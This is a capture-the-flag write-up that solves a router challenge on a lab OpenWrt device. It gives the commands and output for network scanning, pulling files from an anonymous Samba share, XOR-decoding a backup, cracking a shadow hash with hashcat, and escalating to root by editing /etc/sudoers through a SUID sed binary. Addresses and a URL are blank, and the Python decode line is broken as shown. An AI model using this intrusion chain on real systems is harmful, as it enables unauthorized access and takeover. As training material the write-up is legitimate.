Pwn2own CTF (Hacking Club, IIITH)

Writeup for Router challenge

  1. Find the gateway for the router. This can be done by executing ip a:
     2: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
     link/ether c0:b8:83:58:de:a0 brd ff:ff:ff:ff:ff:ff
     inet brd scope global dynamic noprefixroute wlan0
        valid_lft 43158sec preferred_lft 43158sec
     inet6 fd7f:9138:f698::4cc/128 scope global dynamic noprefixroute 
        valid_lft 43158sec preferred_lft 43158sec
     inet6 fd7f:9138:f698:0:1bae:f399:1d82:be49/64 scope global noprefixroute 
        valid_lft forever preferred_lft forever
     inet6 fe80::93f0:acf3:4a79:4dac/64 scope link noprefixroute 
        valid_lft forever preferred_lft forever

    From here we can figure out that the gateway is

  2. Now run nmap -vvvv to find out the services available:
     Starting Nmap 7.94 ( ) at 2024-02-11 13:12 IST
     Initiating Ping Scan at 13:12
     Scanning [2 ports]
     Completed Ping Scan at 13:12, 0.00s elapsed (1  total hosts)
     Initiating Parallel DNS resolution of 1 host. at    13:12
     Completed Parallel DNS resolution of 1 host. at     13:12, 0.00s elapsed
     DNS resolution of 1 IPs took 0.00s. Mode: Async     [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
     Initiating Connect Scan at 13:12
     Scanning OpenWrt.lan ( [1000 ports]
     Discovered open port 139/tcp on
     Discovered open port 22/tcp on
     Discovered open port 445/tcp on
     Discovered open port 80/tcp on
     Discovered open port 53/tcp on

    Here we can see that some samba ports are open, so let’s try connecting via a samba client.

  3. Run smbclient -L openwrt.lan -U% to find the shares in the samba server.
     Sharename       Type      Comment
     ---------       ----      -------
     Backups         Disk      
     IPC$            IPC       IPC Service (Samba on OpenWRT)

    Here we can see that there is a share named Backups which is interesting.

  4. Now let’s get into the samba shell using smbclient //openwrt.lan/Backups -U root. The password is empty. Now we can list the directories and download all the files.
     Try "help" to get a list of possible commands.
     smb: \> dir
       .                                   D         0  Sun Feb 11 10:22:42 2024
       ..                                  D         0  Sun Feb 11 04:25:43 2024
       etc.tar.gz                          N     201256  Sun Feb 11 09:56:40 2024
       hey.txt                             N         114  Sun Feb 11 10:22:42 2024
     		19608 blocks of size 1024. 15580 blocks     available
     smb: \> get etc.tar.gz
     getting file \etc.tar.gz of size 201256 as etc. tar.gz (901.6 KiloBytes/sec) (average 901.6  KiloBytes/sec)
     smb: \> get hey.txt
     getting file \hey.txt of size 114 as hey.txt (1.    7 KiloBytes/sec) (average 692.4 KiloBytes/sec)
     smb: \> exit
  5. Let’s check out hey.txt:
     Hey, make sure to keep the backups safe from everyone. We dont want anyone 
     to be able to read it!! Keep it safe!

    So it looks like the next stage is with etc.tar.gz.

  6. But tar xzf doesn’t work with the file since the file is corrupted:
     $ file etc.tar.gz
     etc.tar.gz: data
  7. Let’s find out what’s going on with file using xxd:
     $ xxd etc.tar.gz | head                          Sunday 11 February 2024 01:27:07 PM
     00000000: 9f0b 8880 8080 8080 8083 6cdd fbf3    5bb6  ..........l...[.
     00000010: 366f 3f52 2740 a81d f53b a3ca fccb    4e0e  6o?R'@...;....N.
     00000020: e72e 1bba 2de7 12b4 b7ce 1b59 4df6    b890  ....-......YM...
     00000030: 89c9 2879 8a9f 261c ed3f 7bbd 809f    62db  ..(y..&..?{...b.
     00000040: 14e3 3bf7 f74d 44a2 f980 7c80 9e1c    f3f0  ..;..MD...|.....
     00000050: f088 12a4 b267 dfbd 70a6 4236 50b4    3e07  .....g..p.B6P.>.
     00000060: 2d3e 6747 122a 6952 e231 1097 c017    c4c5  ->gG.*iR.1......
     00000070: ddfc 0534 07ee 985b 62b0 4281 c2df    851e  ...4...[b.B.....
     00000080: 9775 65bb 147e ef3a 9168 7f77 7ff8    58ba  .ue..~.:.h.w..X.
     00000090: f87f af96 077a dfd6 7505 8add 8f7d afad  .....z..u....}..
  8. Looks like the bytes are XOR’d with 0x80, so let’s XOR it with 0x80 to restore it:
     with open('stage2.tar.gz', 'wb') as output:
         with open('etc.tar.gz', 'rb') as input:
             output.write(bytes([i ^ 0x80 for i in]))
  9. Now tar xzf stage2.tar.gz will give a etc directory.
  10. Let’s check out /etc/shadow:
  11. Now cracking the password of the allen user using hashcat:
    $ hashcat -a 0 -m 500 '$1$okn32I0G$O0cA/T7JTiQ.I8im2lxgr0' ~/rockyou.txt
  12. The password is allen070306:
    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
    Hash.Target......: $1$okn32I0G$O0cA/T7JTiQ.I8im2lxgr0
  13. Now we can ssh into the router as the allen user:
    $ ssh allen@openwrt.lan
  14. Now let’s try to find some privilege escalation vectors using linpeas. SCP the script to the router and execute it.
    $ wget
    $ scp allen@openwrt.lan:/tmp/
  15. From the output of linpeas we can find this interesting bit:
    ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
    ╔══════════╣ SUID - Check easy privesc, exploits and write perms
    strace Not Found
    -rwsr-xr-x    1 root     root      196.0K Sep 20 00:08 /overlay/upper/usr/bin/sudo  --->    check_if_the_sudo_version_is_vulnerable
    -rwsr-xr-x    1 root     root      128.3K Feb 28  2023 /overlay/upper/usr/libexec/sed-gnu (Unknown SUID     binary!)
    -rwsr-xr-x    1 root     root      196.0K Sep 20 00:08 /usr/bin/sudo  --->      check_if_the_sudo_version_is_vulnerable
    -rwsr-xr-x    1 root     root      128.3K Feb 28  2023 /usr/libexec/sed-gnu (Unknown SUID binary!)
  16. You can find the odd /usr/libexec/sed-gnu binary with the SUID bit set. So we can execute sed with root privileges.
  17. Let’s run the binary to modify the /etc/sudoers file to give sudo access to our allen user:
    $ /usr/libexec/sed-gnu -ibak "s/### allen ALL=(ALL:ALL) NOPASSWD: ALL/allen ALL=(ALL:ALL) NOPASSWD: ALL/" /etc/sudoers
  18. Now we have root access to the router via sudo. Challenge solved!
